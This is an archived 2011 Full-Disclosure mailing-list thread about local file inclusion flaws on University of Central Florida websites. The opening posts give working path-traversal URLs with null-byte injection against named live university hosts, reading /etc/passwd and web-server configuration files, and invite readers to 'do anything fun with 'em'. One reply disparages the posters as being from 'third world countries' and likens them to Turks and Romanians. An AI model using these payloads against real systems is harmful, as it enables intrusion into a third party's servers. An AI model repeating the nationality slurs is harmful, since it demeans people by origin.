Re: [Full-disclosure] University of Central Florida Multiple LFI
- To: Eyeballing Weev <eyeballing.weev@xxxxxxxxx>
- Subject: Re: [Full-disclosure] University of Central Florida Multiple LFI
- From: Hack Talk <hacktalkblog@xxxxxxxxx>
- Date: Sat, 19 Feb 2011 12:12:51 -0500
I surely hope they do too, I haven't had to use my EFF lawyer for a while
and I'd love to hang with him again, he's a really great guy :D.
Luis Santana
On Sat, Feb 19, 2011 at 12:07 PM, Eyeballing Weev <eyeballing.weev@xxxxxxxxx> wrote:
> Might as well register a new email account too because "hacktalkblog" is
> just as obvious as posting a link to your site. I hope UCF calls FDLE
> and you can explain to Special Agent Veazy and others about your "research"
>
> On 02/19/2011 12:04 PM, Hack Talk wrote:
> > I actually live close to the University of Central Florida and after
> > countless attempts to contact both their infosec team, the "tech
> > rangers", and their personal web developers with no contact back or
> > patching of these vulnerabilities I decided to post these up on FD.
> > There are still many, _many_ more vulnerabilities which I have yet to
> > disclose as I'm still giving them a chance to patch them.
> >
> > Also, I usually remove my website from the email as it's part of my
> > standard email signature, guess I just couldn't be bothered to do it
> > when I sent in this vulnerability. I'll be sure to be better about
> > removing it so people aren't so butthurt.
> >
> >
> > Luis Santana
> >
> >
> >
> > On Sat, Feb 19, 2011 at 11:48 AM, Eyeballing Weev
> > <eyeballing.weev@xxxxxxxxx> wrote:
> >
> > Madhur Ahuja and "Hack Talk" are obviously from third world countries
> > and are only doing this for publicity, much like how Turks and Romanians
> > "hack" into websites for defacement purposes. Same concept just applied
> > differently.
> >
> > On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
> > > Hi,
> > >
> > > At the risk of being ridiculed here, I'll point out that UCF does have
> > > an Infosec office and an incident response POC.
> > >
> > > https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
> > > sirt@xxxxxxxxxxxx
> > >
> > > fwiw, security folks in .edus are at the low-end of this industry's
> > > pay-scale and it's difficult to find/retain qualified people, not to
> > > mention adequate budget for purchasing (even more) crappy security
> > > products and almost no budget for professional development like
> > > training and conferences.
> > >
> > > I would expect there are more challenging targets out there, were one
> > > inclined...
> > >
> > > Cheers,
> > > --scm
> > >
> > >
> > > On Sat, Feb 19, 2011 at 06:04, Madhur Ahuja <ahuja.madhur@xxxxxxxxx> wrote:
> > >>
> > >> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
> > >>
> > >> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk <hacktalkblog@xxxxxxxxx> wrote:
> > >>>
> > >>> Found these and thought I'd share:
> > >>>
> > >>> -==================-
> > >>>
> > >>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> > >>>
> > >>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> > >>> -==================-
> > >>> Let me know if you do anything fun with 'em
> > >>>
> > >>> Luis Santana - Security+
> > >>> Administrator - http://hacktalk.net
> > >>> HackTalk Security - Security From The Underground
> > >>>
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/